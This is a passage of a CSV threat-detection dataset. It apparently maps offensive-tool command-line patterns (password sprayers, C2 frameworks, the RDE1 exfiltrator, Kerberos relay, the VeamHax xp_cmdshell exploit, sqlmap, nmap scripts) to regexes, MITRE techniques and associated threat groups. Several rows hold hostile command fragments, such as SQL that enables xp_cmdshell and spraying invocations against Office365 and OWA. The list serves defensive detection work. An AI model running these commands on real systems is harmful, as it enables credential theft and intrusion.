Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","3307"
"* spellgen.py *",".{0,1000}\sspellgen\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","3308"
"* spellstager.py *",".{0,1000}\sspellstager\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","3309"
"* spinningteacup.py*",".{0,1000}\sspinningteacup\.py.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3310"
"* -spn cifs* -session * -clsid * -secrets*",".{0,1000}\s\-spn\scifs.{0,1000}\s\-session\s.{0,1000}\s\-clsid\s.{0,1000}\s\-secrets.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","3311"
"* -spn cifs/* -hashes*",".{0,1000}\s\-spn\scifs\/.{0,1000}\s\-hashes.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","3312"
"* Spoof extensions\Spoofer.exe*",".{0,1000}\sSpoof\sextensions\\Spoofer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","3313"
"* spoofer.py*",".{0,1000}\sspoofer\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","3314"
"* -SpooferIP *",".{0,1000}\s\-SpooferIP\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-Tater.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3315"
"* --spoofppid --ppid *",".{0,1000}\s\-\-spoofppid\s\-\-ppid\s.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","3316"
"* SpoolFool *.dll",".{0,1000}\sSpoolFool\s.{0,1000}\.dll","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","3317"
"* SpoolFool.ps1*",".{0,1000}\sSpoolFool\.ps1.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","3318"
"* spoolsploit *",".{0,1000}\sspoolsploit\s.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","3319"
"* --spray *--shuffle-users*",".{0,1000}\s\-\-spray\s.{0,1000}\-\-shuffle\-users.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3320"
"* spray -ep ex-plan.s365*",".{0,1000}\sspray\s\-ep\sex\-plan\.s365.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","3321"
"* --spray --passwords *",".{0,1000}\s\-\-spray\s\-\-passwords\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3322"
"* --spray --push-locked --months-only --exclude *",".{0,1000}\s\-\-spray\s\-\-push\-locked\s\-\-months\-only\s\-\-exclude\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3323"
"* --spray --push-locked --months-only*",".{0,1000}\s\-\-spray\s\-\-push\-locked\s\-\-months\-only.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3324"
"* spray -u * -H * -p * -m owa*",".{0,1000}\sspray\s\-u\s.{0,1000}\s\-H\s.{0,1000}\s\-p\s.{0,1000}\s\-m\sowa.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","3325"
"* spray -u * -p * -m Office365*",".{0,1000}\sspray\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-m\sOffice365.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","3326"
"* spray -u * -p * -m Smb -H *",".{0,1000}\sspray\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-m\sSmb\s\-H\s.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","3327"
"* spraycharles.py*",".{0,1000}\sspraycharles\.py.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","3328"
"* SprayLove.py*",".{0,1000}\sSprayLove\.py.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","3329"
"* --spraypassword *",".{0,1000}\s\-\-spraypassword\s.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","3330"
"* --sql ""EXEC master..xp_cmdshell*",".{0,1000}\s\-\-sql\s\""EXEC\smaster\.\.xp_cmdshell.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","3331"
"* --sql ""EXEC sp_configure 'xp_cmdshell'*",".{0,1000}\s\-\-sql\s\""EXEC\ssp_configure\s\'xp_cmdshell\'.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","3332"
"* --sql ""EXEC sp_configure 'xp_cmdshell', '1'*",".{0,1000}\s\-\-sql\s\""EXEC\ssp_configure\s\'xp_cmdshell\',\s\'1\'.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","3333"
"* SQLC2.ps1*",".{0,1000}\sSQLC2\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","3334"
"* SQLDmpr0001.mdmp*",".{0,1000}\sSQLDmpr0001\.mdmp.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","3335"
"* SQLITE_DATABASE=chaos *",".{0,1000}\sSQLITE_DATABASE\=chaos\s.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","3336"
"* SQLITE_DATABASE=chaos*",".{0,1000}\sSQLITE_DATABASE\=chaos.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","3337"
"* --sql-shell*",".{0,1000}\s\-\-sql\-shell.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3338"
"* srde_arm_musl https -*",".{0,1000}\ssrde_arm_musl\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3339"
"* srde_armv7 https -*",".{0,1000}\ssrde_armv7\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3340"
"* srde_debug https -*",".{0,1000}\ssrde_debug\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3341"
"* srde_linux https -*",".{0,1000}\ssrde_linux\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3342"
"* srde_linux_aarch64 https -*",".{0,1000}\ssrde_linux_aarch64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3343"
"* srde_linux_x86_64 https -*",".{0,1000}\ssrde_linux_x86_64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3344"
"* srde_macos https -*",".{0,1000}\ssrde_macos\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3345"
"* srde_release https -*",".{0,1000}\ssrde_release\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3346"
"* srde_windows https -*",".{0,1000}\ssrde_windows\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3347"
"* srde_windows_x64 https -*",".{0,1000}\ssrde_windows_x64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3348"
"* srde_windows_x86 https -*",".{0,1000}\ssrde_windows_x86\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3349"
"* --srdi-obfuscate-imports *",".{0,1000}\s\-\-srdi\-obfuscate\-imports\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","3350"
"* SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345*",".{0,1000}\sSRVHOST\=127\.0\.0\.1\sSRVPORT\=4444\sRAND\=12345.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3351"
"* -sS -p- --min-rate=* -Pn*",".{0,1000}\s\-sS\s\-p\-\s\-\-min\-rate\=.{0,1000}\s\-Pn.{0,1000}","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing (stealphy mode)","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Discovery","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3352"
"* ssh *@gsocket*",".{0,1000}\sssh\s.{0,1000}\@gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","3353"
"* ssh2-enum-algos.nse*",".{0,1000}\sssh2\-enum\-algos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3355"
"* ssh-auth-methods.nse*",".{0,1000}\sssh\-auth\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3356"
"* ssh-brute.nse*",".{0,1000}\sssh\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3357"
"* ssh-hostkey.nse*",".{0,1000}\sssh\-hostkey\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3358"
"* ssh-log4shell.nse*",".{0,1000}\sssh\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","3359"
